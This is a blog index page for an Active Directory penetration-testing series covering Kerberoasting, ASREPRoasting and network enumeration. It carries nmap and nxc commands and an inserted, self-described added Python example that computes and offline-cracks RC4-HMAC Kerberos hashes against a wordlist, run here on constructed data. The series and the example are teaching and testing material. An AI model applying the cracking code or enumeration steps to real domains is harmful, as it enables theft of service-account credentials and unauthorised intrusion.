[AD Hacking] 0x05 - Kerberoasting

Intro Quick Recap In order to understand how Kerberoasting works, we first need to do a quick recap of the Kerberos authentication flow. We know that in order to get tickets for a user we can send an AS-REQ to the KDC with our authentication details, and it will answer with an AS-REP containing a TGT for the principal we authenticated as: We also already went through the unauthenticated ASREPRoasting attack, which is possible when the user we request the TGT for does not require pre-authentication: we just specify their username in the AS-REQ, and since the encrypted part of the AS-REP (which carries the session key) is encrypted with the user's hash, we can try to crack it....

September 25, 2024 · 4 min · 657 words · Iuri Moro

[AD Hacking] 0x04 - Basic Authenticated Enumeration

Enumerating Accesses Once you have credentials, the first thing you should do is confirm what access and privileges you have over the machines in the internal network, paying special attention to machines where you have any administrative access or privileges to access them remotely. In Active Directory, the main options for remote access are usually WinRM, RDP and SMB (the latter only if you are local administrator). # SMB: Usually requires you to be local administrator on the machine nxc smb smbHosts....

September 16, 2024 · 9 min · 1824 words · Iuri Moro

[AD Hacking] 0x03 - Unauthenticated Attacks

ASREPRoasting (Requires usernames) ASREPRoasting is an attack that leverages misconfigured Active Directory accounts that do not require pre-authentication. Normally, when a user attempts to authenticate via Kerberos to get the first TGT, the Key Distribution Center (KDC) requires them to first send, along with their username, a timestamp encrypted using the user's password hash. When the DONT_REQ_PREAUTH flag is set for a user account, though, attackers can request a TGT for that account (AS-REQ) without this encrypted timestamp....

September 15, 2024 · 12 min · 2386 words · Iuri Moro
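Both the Kerberoasting and the ASREPRoasting excerpts above come down to the same primitive: a blob encrypted under a key derived from a password (the NT hash, for RC4-HMAC / etype 23), which an attacker can verify offline by re-deriving the key from each candidate password and checking the HMAC-MD5 checksum. The following is an added, self-contained example written for this page, not code from the blog or from any of the tools it mentions. It implements RC4-HMAC as specified in RFC 4757 on top of a pure-Python MD4, formats the result into hashcat-style `$krb5asrep$23$` (mode 18200) and `$krb5tgs$23$` (mode 13100) strings, and cracks them with a tiny wordlist. The account names, realm, SPN, password, wordlist and the "enc-part" bodies are all constructed stand-ins: a real AS-REP or service ticket carries an ASN.1-encoded EncASRepPart / EncTicketPart there.

```python
"""RC4-HMAC (etype 23) model of ASREPRoasting / Kerberoasting, offline.
Added example with constructed data; not the blog's code, not impacket or hashcat."""
import hashlib
import hmac
import secrets
import struct
from typing import Iterable, Optional

KEY_USAGE_TICKET = 2  # ticket enc-part, keyed by the service account (Kerberoasting, hashcat 13100)
KEY_USAGE_AS_REP = 8  # AS-REP enc-part with RC4; Windows KDCs use usage 8 here (ASREPRoasting, hashcat 18200)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)  # round-3 word order
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:    # round 1: F, words in order
                f, k, s, t = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:  # round 2: G, words 0,4,8,12,1,5,...
                f, k, s, t = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:         # round 3: H, words from k3
                f, k, s, t = b ^ c ^ d, k3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rol((a + f + X[k] + t) & mask, s), b, c  # rotate roles each step
        h = [(x + y) & mask for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:     # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf||pt); K3 = HMAC(K1, checksum)."""
    confounder = confounder or secrets.token_bytes(8)
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes) -> Optional[bytes]:
    """Returns the plaintext (confounder stripped) or None if the checksum fails, i.e. wrong key."""
    checksum, body = edata[:16], edata[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    plain = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), body)
    if not hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
        return None
    return plain[8:]


def asrep_hash(user: str, realm: str, edata: bytes) -> str:
    return f"$krb5asrep$23${user}@{realm}:{edata[:16].hex()}${edata[16:].hex()}"


def tgs_hash(user: str, realm: str, spn: str, edata: bytes) -> str:
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def parse_hash(h: str):
    """Both formats end in <checksum-hex>$<edata-hex>; pick the key usage from the prefix."""
    usage = KEY_USAGE_AS_REP if h.startswith("$krb5asrep$23$") else KEY_USAGE_TICKET
    head, edata_hex = h.rsplit("$", 1)
    return usage, bytes.fromhex(head[-32:] + edata_hex)


def crack(h: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess: derive the key per candidate and test the checksum; no KDC involved."""
    usage, edata = parse_hash(h)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), usage, edata) is not None:
            return candidate
    return None


# Constructed sample data (hypothetical accounts, realm, SPN, password and wordlist).
SERVICE_PASSWORD = "Summer2024!"
FAKE_ENC_ASREP_PART = b"constructed stand-in for the ASN.1 EncASRepPart (session key etc.)"
FAKE_ENC_TICKET_PART = b"constructed stand-in for the ASN.1 EncTicketPart of a service ticket"
WORDLIST = ["Password1", "Welcome1", "Summer2024!", "Winter2023"]


def demo() -> dict:
    key = nt_hash(SERVICE_PASSWORD)
    asrep = asrep_hash("svc_backup", "CORP.LOCAL", rc4_hmac_encrypt(key, KEY_USAGE_AS_REP, FAKE_ENC_ASREP_PART))
    tgs = tgs_hash("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
                   rc4_hmac_encrypt(key, KEY_USAGE_TICKET, FAKE_ENC_TICKET_PART))
    return {"asrep": asrep, "tgs": tgs, "cracked_asrep": crack(asrep, WORDLIST), "cracked_tgs": crack(tgs, WORDLIST)}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The two attacks differ only in which key usage number feeds K1 and whose password the key is derived from: the targeted user's for AS-REP roasting, the service account's for Kerberoasting. Because the checksum is verifiable with nothing but the captured blob, the only defences that matter are the ones the posts point at: no accounts with DONT_REQ_PREAUTH, long random passwords (or gMSAs) for service accounts, and disabling RC4 so tickets come back as AES (etype 17/18, far slower to brute-force).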

[AD Hacking] 0x02 - Unauthenticated Enumeration

Enumerating Machines Finding AD-Joined Hosts The first step is to use simple tools to enumerate the internal network, identifying hosts with SMB ports open, as this is the main service used for communication between AD-joined machines and servers. There are 3 main alternatives for that: nmap Do a simple port scan across the entire network to find hosts with ports 139 and 445 open: nmap -p139,445 -Pn <IP_RANGE> -oG smb....

September 14, 2024 · 7 min · 1471 words · Iuri Moro

[AD Hacking] 0x01 - Understanding Active Directory

Introduction to Active Directory In simple terms, Active Directory (or AD) is a way to centralize the management and administration of Windows environments. A trick to remember its goal is to rethink what it is called, and why it is a Directory. As described by Microsoft: “A directory is a hierarchical structure that stores information about objects on the network”. And that’s exactly what this type of environment does: it allows you to store, manage and use information about the objects inside a network....

September 14, 2024 · 10 min · 2021 words · Iuri Moro